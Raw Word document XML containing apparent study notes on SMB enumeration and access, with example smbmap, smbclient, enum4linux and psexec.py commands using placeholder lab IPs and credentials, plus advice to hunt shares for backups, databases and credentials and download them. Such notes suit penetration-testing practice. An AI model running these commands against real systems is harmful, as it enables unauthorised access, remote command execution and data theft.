      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> null/anonymous check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B175E17" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> -H 10.0.0.5 -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>alice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> -p '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>Secret123' #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> check permissions with creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A819A0E" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:r w:rsidRPr="001D1930">
        <w:t>What to look for: shares marked READ/WRITE or files that look like backups, DBs, creds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FFF51B" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E6B0DD6" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:r w:rsidRPr="001D1930">
        <w:t>What it does (simple): interactive SMB client — browse shares and download/upload files (like ftp for SMB).</w:t>
      </w:r>
      <w:r w:rsidRPr="001D1930">
        <w:br/>
        <w:t>Quick commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFE9C57" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> -L //10.0.0.5 -N # list shares anonymously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C08806" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> //10.0.0.5/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>ShareName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> -U </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>alice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> # connect (will prompt for password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322F46E4" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve">Inside the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> prompt use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABF6434" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1930">
        <w:t>ls — list files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7414C0" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>dirname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> — change </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2F4CFF3D" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1930">
        <w:t>get file.txt — download a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E899CF" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>mget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> *.txt — download many</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71615B16" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve">recurse ON then </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>mget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> * —</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> download directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF0405F" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>exit — leave</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="21E24D36" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1930">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Short workflow (two lines)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B8DC26" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1930">
        <w:t>enum4linux -a &lt;target&gt; — broad info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE254E1" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> — see permissions (who can read/write).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DF02A0" w14:textId="77777777" w:rsidR="001D1930" w:rsidRPr="001D1930" w:rsidRDefault="001D1930" w:rsidP="001D1930">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D1930">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001D1930">
        <w:t xml:space="preserve"> — connect and grab files you found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5FD77B" w14:textId="77777777" w:rsidR="001D1930" w:rsidRDefault="001D1930"/>
    <w:p w14:paraId="5D36629C" w14:textId="286F0C41" w:rsidR="009C2396" w:rsidRPr="0042538B" w:rsidRDefault="009C2396">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2396">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2396">
        <w:t xml:space="preserve"> — executes a command on a Windows host over SMB by creating a temporary service (remote command execution).</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2396">
        <w:br/>
        <w:t>psexec.py DOMAIN/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C2396">
        <w:t>Administrator:Passw0rd@10.10.10.10</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C2396">
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2396">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2396">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009C2396" w:rsidRPr="00425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3F36"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="59F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A728F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="31063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267A6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="557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2331"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="760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D64D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27BC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3755A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91F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68697">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1340431581">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="402722108">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1236629224">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1964771560">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1178085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D3"/>
    <w:rsid w:val="000B7343"/>
    <w:rsid w:val="000C223D"/>
    <w:rsid w:val="000F18CF"/>
    <w:rsid w:val="001151EA"/>
    <w:rsid w:val="001D1930"/>
    <w:rsid w:val="00270113"/>
    <w:rsid w:val="0042538B"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="005606AB"/>
    <w:rsid w:val="00566B0F"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006D56A8"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008F7609"/>
    <w:rsid w:val="009B25A3"/>
    <w:rsid w:val="009C2396"/>
    <w:rsid w:val="00A1732F"/>
    <w:rsid w:val="00B64C6A"/>
    <w:rsid w:val="00CF0D86"/>
    <w:rsid w:val="00DC14D3"/>
    <w:rsid w:val="00E477B0"/>
    <w:rsid w:val="00E76D56"/>
    <w:rsid w:val="00F616EE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6F56"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7F09B90E-733D-4C96-9EA1-AB66FB5D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49</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-19T06:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-19T07:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>